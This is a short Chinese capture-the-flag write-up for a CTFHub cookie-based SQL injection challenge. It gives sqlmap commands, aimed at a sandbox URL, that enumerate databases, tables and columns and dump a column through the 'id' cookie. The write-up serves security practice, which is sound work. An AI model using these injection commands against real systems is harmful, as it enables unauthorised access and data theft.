CTFHub-cookie注入
手工注入
根据提示查找cookie值后通过burpsuite抓包改变cookie值来实现注入,不再赘述
sqlmap注入
查询数据库名:sqlmap.py -u http://challenge-9ae1c4fc157765eb.sandbox.ctfhub.com:10800/ --cookie "id=1" --level=2 --dbs
查询表名:sqlmap.py -u http://challenge-9ae1c4fc157765eb.sandbox.ctfhub.com:10800/ --cookie "id=1" --level=2 -D sqli --tables
查询字段名:sqlmap.py -u http://challenge-9ae1c4fc157765eb.sandbox.ctfhub.com:10800/ --cookie "id=1" --level=2 -D sqli -T ggathoowju --columns
dump出字段信息:sqlmap.py -u http://challenge-9ae1c4fc157765eb.sandbox.ctfhub.com:10800/ --cookie "id=1" --level=2 -D sqli -T ggathoowju -C qtegoprsaa --dump